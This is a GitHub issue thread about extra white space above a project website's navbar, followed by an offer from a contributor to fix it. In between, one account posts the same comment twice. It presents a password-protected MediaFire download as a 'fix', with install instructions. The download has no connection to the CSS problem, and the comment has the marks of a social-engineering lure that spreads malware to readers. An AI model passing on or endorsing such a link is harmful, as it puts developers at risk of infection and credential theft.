### ISSUE TITLE
Navbar padding

### ISSUE THREAD

**Issue by Rizwan102003** [Code-Social/official-website#6]
**white space above the navbar**
There is some space between the navbar and the top of the page

**To Reproduce**
1. Go to - https://code-social.github.io/official-website/
2. It can be found at the top

**Expected behavior**
No extra space 

**Additional context**
The logo on the navbar breaks if I try to change the padding of the navbar.Try to implement a solution that takes care of the issue without breaking anything.

**Desktop (please complete the following information):**
 - OS: [Ubuntu,Windows 11]
 - Browser [chrome]

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Ananya-vastare** [comment]
I am GSSOC contributor and I would like to solve this issue
